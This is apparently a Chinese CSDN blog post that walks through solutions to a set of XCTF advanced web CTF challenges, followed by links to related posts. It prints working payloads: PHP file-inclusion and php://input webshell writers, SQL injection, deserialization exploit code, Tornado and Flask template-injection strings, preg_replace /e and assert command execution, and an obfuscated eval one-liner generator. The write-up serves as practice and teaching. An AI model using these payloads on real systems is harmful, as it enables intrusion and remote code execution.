攻防世界web进阶(第一页)

最新推荐文章于 2023-07-16 13:23:59 发布
最新推荐文章于 2023-07-16 13:23:59 发布
阅读量500 收藏 1
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46540840/article/details/119425216
版权

php_rce

利用peiqi Thinkphp 一键getshell 得flag

Web_php_include

源码如下

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

php://过滤了 尝试使用 data:协议

page=data://text/plain,<?system(%27nl%20fl4gisisish3r3.php%27);?>

查看源码得到flag

补充

php://协议

php://filter/read=convert.base64-encode/resource=[文件名]读取文件源码(针对php文件需要base64编码)

php://input + [POST DATA]执行php代码

如果有权限的话 可以利用此协议写入一句话

http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

data://协议 也是来执行php代码的 和php:input差不多 但用法不同

  • 作用:自PHP>=5.2.0起,可以使用data://数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。

  • 用法:

    data://text/plain,
data://text/plain;base64,

ics-06

随便点到index.php?id=4 网页下 用bp 爆破对应的 id 数 得到flag

warmup

代码如下

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

首先访问hint.php 最后payload为: ?file=source.php?../…/…/…/…/ffffllllaaaagggg

就注意这个点吧

如果定义了路径,就会忽视 前面字符串 去找你写的../../../../../ffffllllaaaagggg

NewsCenter

一点过滤都没有

sqlmap 一把梭

或者手工post

search=-1'union select 1,group_concat(id,fl4g),3 from secret_table#

得到flag

NaNNaNNaNNaN-Batman

下载下来是乱码文件,不懂了搜了一下, 加一个alert()函数将其弹窗就行了

格式一下代码

function $() {
	var e = document.getElementById("c").value;
	if (e.length == 16) if (e.match(/^be0f23/) != null) if (e.match(/233ac/) != null) if (e.match(/e98aa$/) != null) if (e.match(/c7be9/) != null) {
		var t = ["fl", "s_a", "i", "e}"];
		var n = ["a", "_h0l", "n"];
		var r = ["g{", "e", "_0"];
		var i = ["it'", "_", "n"];
		var s = [t, n, r, i];
		for (var o = 0; o < 13; ++o) {
			document.write(s[o % 4][0]);
			s[o % 4].splice(0, 1)
		}
	}
}
document.write('<input id="c"><button onclick=$()>Ok</button>');
delete _

浏览器console 一下 就行了

PHP2

index.phps 得到源码

<?php
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

Can you anthenticate to this website?

在index.php下进行操作

将a编码一下 就可,因为网页自动会解码一次,所以这里要编码两次

?id=%2561dmin

unserialize3

O:4:"xctf":2:{s:4:"flag";s:3:"111";}

绕过wake_up 函数 只需要 参数个数大于实际参数个数就行 这里1 改成2

upload1

简单传个一句话木马 蚁剑连

Web_php_unserialize

代码如下

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

反序列化构造

<?php

class Demo {
    private $file = 'fl4g.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        echo @highlight_file($this->file, true);
    }
    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}

$A = new Demo('fl4g.php');
$C = serialize($A);
echo $C;


$C = str_replace('O:4', 'O:+4',$C);//绕过preg_match
$C = str_replace(':1:', ':2:',$C);//绕过wakeup
var_dump(base64_encode($C));

easytornado

tornado模板注入

msg=Error存在 注入点

利用{{handler.settings}}拿到cookie

pylaod为

echo md5('f20b584e-691b-4d64-9ca0-a08a89227b6e'.md5('/fllllllllllllag'));

得到flag

shrine

ssTI 注入

{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

ics-05

一乍看[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NV87YbCs-1628162400596)(C:\Users\ASUS\Desktop\QQ截图20210805143017.png)]没啥发现

点进去

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Mwi5ayDW-1628162400598)(C:\Users\ASUS\Desktop\QQ截图20210805143032.png)]

发现这里有文件包含点

?page=php:filter/read=convert.base64-encode/resource=index.php

读源码


//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}



x-forwarded-for:127.0.0.1

这里我们先进行伪造,进入

这里估计是利用 preg_replace /e的命令执行漏洞了, 前提是低版本php

?pat=/e&rep=system('ls')&sub=123

前提是能执行此函数也就是说 匹配的字符串中要含有查找的内容

查找flag

GET /index.php?pat=/12/e&rep=system("find+-name+flag")&sub=12

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ju97NWMK-1628162400600)(C:\Users\ASUS\Desktop\QQ截图20210805145625.png)]

pat=/12/e&rep=system("ls+./s3chahahaDir/flag")

得到>flag.php

cat+./s3chahahaDir/flag/flag.php

得到flag

cyberpeace{3dc3d7735954e387edcd0ff7936d222b}

mfw

看见有page= 尝试文件包含无果

在about 界面中看见 git

用dirsearch 扫一下 发现 .git 文件泄露

GitHack.py 得到源码

重点在这

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
//这里的思路是将其闭合,然后assert(执行命令)
//尝试构造   
//page=aac') or system(phpinfo());//
//page=abc') or system("cat templates/flag.php");//
?>

assert 起到 命令执行的作用

记极客大挑战 rceme 的题目pyload

<?php 
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "<br>";
$c='(eval($_POST[mochu7]))';
$d=urlencode(~$c);
echo $d;
 ?>
————————————————
版权声明:本文为CSDN博主「末 初」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/mochu7777777/article/details/105136633/
Rgylin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[吃烤羊腿烫烫烫] Web_php_include 题解分析
布屿
02-28 3260
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 0.分析代码 我们先来分析一下代码吧。 &lt...
攻防世界web进阶
weixin_54787877的博客
02-21 270
unserialize3 知识点:反序列化漏洞,wakeup魔法函数 php <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= ?> 先对代码补全然后进行审计。 class xctf{ //定义一个名为xctf的类 public flag=′111′;//定义一个公有的类属性flag = '111';
PHP反序列化笔记
大方子
01-16 4060
目录 文章目录目录private变量与protected变量序列化后的特点序列化后的字段长度前面可以加 +题目解题步骤CVE-2016-7124漏洞介绍演示代码题目解题步骤PHP Session 反序列化PHP的3种序列化处理器安全问题当 session.auto_start=Off 时测试Demo题目解题步骤phar反序列化 private变量与protected变量序列化后的特点 \x00 +...
XCTF-攻防世界CTF平台-Web类——4、Web_php_include(php中strstr()函数绕过、数据流协议)
Onlyone_1314的博客
11-14 3005
目录标题一级目录方法一、文件包含:php伪协议绕过strstr()函数方法二、文件包含:GET方式提交命令方法三、data://伪协议方法四、一句话木马连接后台方法五、data://伪协议+一句话木马 一级目录 打开题目地址: 代码: <?php show_source(__FILE__); echo $_GET['hello']; //输出hello变量指向的内容 $page=$_GET['page']; //把page变量的值赋给$page while (strstr($page
攻防世界-Web-Web_php_include
uh_eng的博客
08-05 329
0x01 打开题目,代码如下: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 构造payload简单验证一下是不是文件包含: ?hello=xxx&page=/etc/passwd 结果如下:
php伪协议总结
a3320315的博客
09-29 1990
0x01 首先放源码 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 0x02 分析 s...
攻防世界web解题[进阶](二)
weixin_46703850的博客
03-05 512
攻防世界web解题[进阶](二)
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
黑客攻防入门与进阶
12-16
黑客攻防入门与进阶..
攻防世界 Web_php_include wp
weixin_55029563的博客
07-22 1540
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 首先看到一串PHP代码。 strstr函数:查找字符串首次出现的位置。返回字符串剩余部分 strstr($page, "php://")在page变量中查找p
WEBWeb_php_include(多解)
sleepywin的博客
07-16 1156
解题
攻防世界-Web_php_include
weixin_45694388的博客
10-20 229
分析: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { //查找“php://“在$page中是否存在,存在则进入循环 $page=str_replace("php://", "", $page); //把$page中的"php://"换成空,而且该函数区分大小写 } include($page);.
web_进阶_Web_php_include
JURUO222的博客
08-07 192
先分析这段php代码 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> strstr:查找字符串第一次出现,并返回字符串的剩余部分 str_replace:str_replace() 函数以其他字符替换字符串
CTF题目记录5
kkzzjx
05-22 1694
Web_php_include <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page);//此处为文件包含,执行page中的内容 ?> 考察基础的文件包含,过滤了php:// page变量可以操控 思路:先找flag文件的
PHP反序列化漏洞总结
热门推荐
坚持硬核
10-07 1万+
一、什么是序列化? 将php中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中。而反序列化就是将这个过程倒过来。 当在php中创建了一个对象后,可以通过serialize()把这个对象变成一个字符串,保存对象的值方便以后传递使用。 <?php class A{ public $test = 123; } $a = new A; $a_ser=ser...
攻防世界web高手区(1-6)
bilala的博客
08-03 354
* baby_web 题目描述:想想初始页面是哪个 根据题目描述的提示,访问index.php后发现重定向,尝试抓包 访问得到flag:flag{very_baby_web} * Training-WWW-Robots 访问robots.txt,发现有访问得到flagcyberpeace{eac017d052248ca0093cc503b9e8ff07} php_rce Web_php_include <?phpshow_source(__FILE__);echo $_GET['he
CTF(Web方向练习题)(持续更新)
m0_56010012的博客
02-23 5093
1.Training-WWW-Robots 打开应用场景,如下: 网址后面添加/robots.txt 查看其中内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件),内容如下: 根据提示,访问/fl0g.php,得到flag值。 ...
攻防世界web fileclude
最新发布
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值